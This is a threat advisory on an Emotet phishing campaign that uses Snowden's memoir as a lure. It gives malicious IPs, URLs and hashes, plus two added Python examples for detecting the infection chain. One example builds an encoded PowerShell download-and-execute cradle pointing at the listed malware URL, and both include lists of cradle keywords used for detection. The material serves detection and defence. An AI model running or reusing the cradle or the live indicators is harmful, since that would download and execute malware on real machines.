Severity
High
Analysis Summary
Emotet has resumed its spear-phishing activity, this time using the news around NSA whistleblower Edward Snowden's new memoir, Permanent Record, as a lure. The book is already on Amazon's bestseller list, and criminals routinely piggyback on newsworthy events of this kind for scams and other social engineering. In this campaign the Emotet operators claim to be offering a copy of the memoir as a Word attachment. Phishing emails were observed in English, Italian, Spanish, German and French.

When the document is opened, it displays a fake notice claiming that "Word hasn't been activated" and instructs the victim to click "Enable Content" in the security warning bar. Doing so executes the malicious macro embedded in the document.

The macro launches a PowerShell command that downloads the Emotet binary from a compromised WordPress site (the wp-content/uploads URL in the indicators below). Once installed, the malware attempts to contact one of Emotet's many command-and-control (C2) servers.
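As an added example (not part of the Rewterz advisory), the following Python shows how the Word-to-PowerShell stage of this chain can be picked out of process-creation telemetry such as Sysmon Event ID 1: it flags PowerShell spawned by an Office process, decodes a -EncodedCommand payload (PowerShell expects base64 over UTF-16LE text) and checks the result for download-cradle markers. The sample events, the cradle text and the local file path are constructed for illustration; only the download URL is taken from the indicator list below.

```python
import base64
import re

# Parents that should rarely, if ever, spawn PowerShell on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Substrings typical of a download-and-execute cradle (matched case-insensitively).
CRADLE_MARKERS = ("net.webclient", "downloadfile", "downloadstring",
                  "invoke-webrequest", "invoke-expression", "iex ", "start-process")


def decode_encoded_command(cmdline):
    """Return the decoded script when cmdline carries -e/-ec/-enc/-EncodedCommand <base64>,
    else None. A payload that is not valid base64/UTF-16LE is reported as None rather than
    crashing the scan."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return an alert dict for an Office -> PowerShell process creation, or None otherwise.
    event is a dict with ParentImage, Image and CommandLine (Sysmon Event ID 1 field names)."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    if parent not in OFFICE_PARENTS or image not in POWERSHELL_IMAGES:
        return None
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    markers = [m for m in CRADLE_MARKERS if m in script.lower()]
    return {
        "parent": parent,
        "encoded": decoded is not None,
        "script": script,
        "markers": markers,
        # Office spawning PowerShell alone is suspicious; a cradle inside it is high severity.
        "severity": "high" if markers else "medium",
    }


def scan(events):
    return [a for a in (classify_event(e) for e in events) if a is not None]


# Constructed sample, modelled on the chain described in the advisory. The local file
# path is a placeholder; the URL is the compromised WordPress site from the IOC list.
_CRADLE = ("$w=New-Object Net.WebClient;"
           "$w.DownloadFile('http://www.cia.com.py/wp-content/uploads/2019/09/XNFerERN/',"
           "\"$env:TEMP\\payload.exe\");Start-Process \"$env:TEMP\\payload.exe\"")
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},  # benign: not from Office
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -enc {_ENCODED}"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['parent']} -> powershell, markers={alert['markers']}")
        print("  decoded:", alert["script"])
```

The parent/child match does the heavy lifting; the marker list only raises severity, so an Office-spawned PowerShell with an obfuscated or unrecognised payload still surfaces as a medium-severity event for review.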
Impact
- Credential Theft
- Financial Loss
- Loss of Information
Indicators of Compromise
IP(s) / Hostname(s)
- 178[.]32[.]255[.]133
- 133[.]130[.]73[.]156
- 62[.]75[.]171[.]248
URLs
- http[:]//62[.]75[.]171[.]248[:]7080/chunk/window/ringin/
- http[:]//www[.]cia[.]com[.]py/wp-content/uploads/2019/09/XNFerERN/
Malware Hash (MD5/SHA1/SHA256)
- 757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975 (SHA256)
- 8c540b62bcd2ac90364dd56eb1bb6e46 (MD5)
- 5ab7a5cf290ebf52647771f893a2fa322a9b1891e5a5e54811c500dd290c8477 (SHA256)
- b960f1afb95b6f0e53b3fcec2aa54a98 (MD5)
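Added example, not from the advisory: the indicators above are published defanged, so before they can go into a blocklist or be matched against logs they have to be refanged. This Python does that and runs the result over a few constructed proxy-log lines (a minimal "timestamp client method url" format assumed for illustration), matching on the full URL first and falling back to the host or IP so that a beacon to a listed C2 on a different path is still caught. The hash lookup is a plain case-insensitive set membership test against the advisory's hashes.

```python
from urllib.parse import urlsplit

# Indicators copied from the advisory exactly as published (defanged).
DEFANGED_IPS = [
    "178[.]32[.]255[.]133",
    "133[.]130[.]73[.]156",
    "62[.]75[.]171[.]248",
]
DEFANGED_URLS = [
    "http[:]//62[.]75[.]171[.]248[:]7080/chunk/window/ringin/",
    "http[:]//www[.]cia[.]com[.]py/wp-content/uploads/2019/09/XNFerERN/",
]
KNOWN_HASHES = {
    "757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975",
    "8c540b62bcd2ac90364dd56eb1bb6e46",
    "5ab7a5cf290ebf52647771f893a2fa322a9b1891e5a5e54811c500dd290c8477",
    "b960f1afb95b6f0e53b3fcec2aa54a98",
}


def refang(ioc):
    """Turn a defanged indicator back into its literal form."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


IOC_URLS = {refang(u) for u in DEFANGED_URLS}
# Hostnames of the listed URLs plus the bare IPs; urlsplit() lowercases hostnames.
IOC_HOSTS = {urlsplit(u).hostname for u in IOC_URLS} | {refang(i) for i in DEFANGED_IPS}


def match_request(url):
    """Return 'url' for a prefix match on a listed URL, 'host' for a listed IP or hostname
    on any other path, or None when the request is clean."""
    if any(url.startswith(u) for u in IOC_URLS):
        return "url"
    host = urlsplit(url).hostname or ""
    if host.lower() in IOC_HOSTS:
        return "host"
    return None


def scan_proxy_log(lines):
    """Lines are '<timestamp> <client-ip> <method> <url>' (constructed minimal format)."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines instead of aborting the scan
        timestamp, client, method, url = fields[:4]
        kind = match_request(url)
        if kind:
            alerts.append({"time": timestamp, "client": client, "method": method,
                           "url": url, "match": kind})
    return alerts


def hash_is_known(digest):
    """Case-insensitive lookup of an MD5 or SHA256 hex digest against the advisory's hashes."""
    return digest.strip().lower() in KNOWN_HASHES


# Constructed sample log: two hits on listed URLs, one beacon to a listed IP on an
# unlisted path, one clean request and one malformed line.
SAMPLE_LOG = [
    "2019-09-24T10:02:13Z 10.0.0.15 GET http://www.cia.com.py/wp-content/uploads/2019/09/XNFerERN/",
    "2019-09-24T10:02:40Z 10.0.0.15 POST http://62.75.171.248:7080/chunk/window/ringin/",
    "2019-09-24T10:03:02Z 10.0.0.15 POST http://178.32.255.133/",
    "2019-09-24T10:05:00Z 10.0.0.22 GET https://www.example.com/",
    "malformed line",
]

if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_LOG):
        print(f"{a['time']} {a['client']} {a['method']} {a['url']} -> {a['match']} match")
```

Matching on host as well as full URL matters for Emotet, whose C2 paths change between builds while the server address often stays valid for longer.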
Remediation
- Block the listed indicators (IPs, URLs and file hashes) at the relevant controls: perimeter firewall and proxy, DNS filtering and endpoint protection.
- Do not open email attachments from untrusted or unexpected senders, however topical the subject matter.
- Do not click "Enable Content" or otherwise enable macros unless absolutely necessary; where possible, block macros in documents received from the Internet through Office Group Policy.
- Scan all files with up-to-date anti-malware before executing them.